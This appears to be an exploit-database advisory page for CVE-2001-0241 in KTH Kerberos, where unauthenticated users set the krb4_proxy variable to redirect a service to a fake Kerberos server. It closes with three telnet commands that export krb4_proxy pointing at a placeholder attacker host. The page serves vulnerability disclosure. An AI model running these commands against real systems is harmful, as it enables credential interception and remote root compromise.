KTH Kerberos Environment Variable Manipulation

vendor:

Kerberos

by:

SecurityFocus

8.3

CVSS

HIGH

KTH Kerberos Environment Variable Manipulation

CWE

Product Name: Kerberos

Affected Version From: KTH Kerberos

Affected Version To: KTH Kerberos

Patch Exists: No

Related CWE: CVE-2001-0241

CPE: o:kth:kerberos

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2001

KTH Kerberos Environment Variable Manipulation

KTH Kerberos contains a vulnerability that may allow/assist in a local or remote root compromise. It is possible for malicious remote users (before authenticating) to remotely set the value of the environment variable 'krb4_proxy' and have the server program contact a fake Kerberos server. This would allow the attacker to intercept authentication requests and/or send false replies to the service they are attempting to use. An attacker, for example, could send the environment variable via telnet to a Kerberos supporting telnet daemon. This attack allows malicious users in control of a fake Kerberos server to exploit a buffer overflow vulnerability (See Bugtraq ID 2091) in the Kerberos shared libraries with malformed replies. If exploited, the combined vulnerabilities may provide remote root access to attackers.

Mitigation:

The vulnerability can be mitigated by disabling the krb4_proxy environment variable.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2090/info

Kerberos is a widely used network service authentication system. The version of Kerberos developed and maintained by KTH (Swedish Royal Institute of Technology) contains a vulnerability that may allow/assist in a local or remote root compromise.

KTH Kerberos uses an environment variable called 'krb4_proxy' when a proxy server is required to retrieve tickets via HTTP. KTH Kerberos-supported services will contact the supplied proxy server (the value of krb4_proxy) instead of the default Kerberos server if this variable is set.

It is possible for malicious remote users (before authenticating) to remotely set the value of this variable and have the server program contact a fake Kerberos server. This would allow the attacker to intercept authentication requests and/or send false replies to the service they are attempting to use. An attacker, for example, could send the environment variable via telnet to a Kerberos supporting telnet daemon.

This attack allows malicious users in control of a fake Kerberos server to exploit a buffer overflow vulnerability (See Bugtraq ID 2091) in the Kerberos shared libraries with malformed replies. If exploited, the combined vulnerabilities may provide remote root access to attackers. 

telnet> environ define krb4_proxy http://your.host:80
telnet> environ export krb4_proxy
telnet> open localhost